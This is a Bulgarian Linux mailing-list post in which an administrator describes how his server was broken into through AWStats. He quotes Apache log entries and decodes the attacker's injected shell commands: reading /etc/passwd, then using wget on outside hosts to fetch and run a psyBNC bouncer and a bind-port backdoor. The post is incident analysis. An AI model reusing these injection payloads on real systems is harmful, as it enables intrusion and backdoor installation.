Благодаря на всички за отговорите. Бяха ми полезни. Машината е пробита през awstats. Компилирането на psybnc не е минало успешно, но tw port backdoor не е срещнал пречки.
Пеиствам Ви разследването което направих: това е от лог файла на апач: 82.96.126.130 - - [22/Feb/2005:22:06:11 +0200] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd% 3buname%20%2da%3bid%3becho%20Instalam%20Bind%20in%20%2fvar%2ftmp%3bcd%20%2fvar%2ftmp%3bwget%20http%3a%2f%2fgeocities%2ecom%2fsickady %2fp%2etgz%3btar%20xvfz%20p%2etgz%3bcd%20psybnc%3bmake%3b%2e%2fpsybnc%3becho%20e_exp%3b%2500 HTTP/1.1" 200 14978 "-" "-" 82.96.126.130 - - [22/Feb/2005:22:09:18 +0200] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20h ttp%3a%2f%2fgeocities%2ecom%2fsickady%2fp%2etgz%3btar%20xvfz%20p%2etgz%3bcd%20psybnc%3b%2e%2fpsybnc%3becho%20e_exp%3b%2500 HTTP/1.1" 200 13307 "-" "-" 82.96.126.130 - - [22/Feb/2005:22:09:54 +0200] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd% 3buname%20%2da%3bid%3becho%20Instalam%20Bind%20in%20%2fvar%2ftmp%3bcd%20%2fvar%2ftmp%3bwget%20www%2epetry%2ese%2fpublic_html%2ftw%2e tar%2egz%3btar%20%2dxvzf%20tw%2etar%2egz%3bcd%20tw%3b%2e%2fbind%3becho%20Instalam%20bind%20in%20%2ftmp%3bcd%20%2ftmp%3bwget%20www%2e petry%2ese%2fpublic_html%2ftw%2etar%2egz%3btar%20%2dxvzf%20tw%2etar%2egz%3bcd%20rw%3b%2e%2fbind%3becho%20%2d%2d%2d%2d%2d%2d%2d%2d%2d %2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%3becho%20by%20Zorg%20of%20texter%21%3becho%20e_exp%3b%2500 HTTP/1.1" 200 2686 "-" " -" с по-прости думи горе се изпълнява това: 1. |echo ;echo b_exp;cat /etc/passwd;uname -a;id;echo Instalam Bind in /var/tmp;cd /var/tmp;wget http://geocities.com/sickady/p.tgz;tar xvfz p.tgz;cd psybnc;make;./psybnc;echo e_exp;%00 2. |echo ;echo b_exp;cd /tmp;wget http://geocities.com/sickady/p.tgz;tar xvfz p.tgz;cd psybnc;./psybnc;echo e_exp;%00 3. |echo ;echo b_exp;cat /etc/passwd;uname -a;id;echo Instalam Bind in /var/tmp;cd /var/tmp;wget www.petry.se/public_html/tw.tar.gz;tar -xvzf tw.tar.gz;cd tw;./bind;echo Instalam bind in /tmp;cd /tmp;wget www.petry.se/public_html/tw.tar.gz;tar -xvzf tw.tar.gz;cd rw;./bind;echo -------------------------;echo by Zorg of texter!;echo e_exp;%00 с други думи : 1. |echo ; echo b_exp; cat /etc/passwd; uname -a; id; echo Instalam Bind in /var/tmp; cd /var/tmp; wget http://geocities.com/sickady/p.tgz; tar xvfz p.tgz; cd psybnc; make; ./psybnc; echo e_exp; %00 2. |echo ; echo b_exp; cd /tmp; wget http://geocities.com/sickady/p.tgz; tar xvfz p.tgz; cd psybnc; ./psybnc; echo e_exp; %00 3. |echo ; echo b_exp; cat /etc/passwd; uname -a; id; echo Instalam Bind in /var/tmp; cd /var/tmp; wget www.petry.se/public_html/tw.tar.gz; tar -xvzf tw.tar.gz; cd tw; ./bind; echo Instalam bind in /tmp; cd /tmp; wget www.petry.se/public_html/tw.tar.gz; tar -xvzf tw.tar.gz; cd rw; ./bind; echo -------------------------; echo by Zorg of texter!; echo e_exp;%00 след това ги открих тук: /var/tmp# ls -alu -rw-r--r-- 1 nobody nobody 605272 Feb 22 22:06 p.tgz drwxr-xr-x 11 nobody nobody 4096 Feb 22 22:06 psybnc drwxr-xr-x 2 nobody nobody 4096 Feb 22 22:04 tw -rw-r--r-- 1 nobody nobody 16414 Feb 22 22:04 tw.tar.gz -rwxr-xr-x 1 nobody nobody 16414 Feb 22 22:06 x0b /tmp# ls -alu -rw-r--r-- 1 nobody nobody 605272 Feb 22 22:06 p.tgz drwxr-xr-x 11 nobody nobody 4096 Feb 22 22:09 psybnc drwxr-xr-x 2 nobody nobody 4096 Feb 22 22:06 tw -rw-r--r-- 1 nobody nobody 16414 Feb 22 22:07 tw.tar.gz -rwxr-xr-x 1 nobody nobody 16414 Feb 22 22:07 x0b Поздрави ----------------------------------------------------------------- http://gbg.bg/search - Изпробвайте още сега най-добрата българска търсачка! ============================================================================ A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html ============================================================================
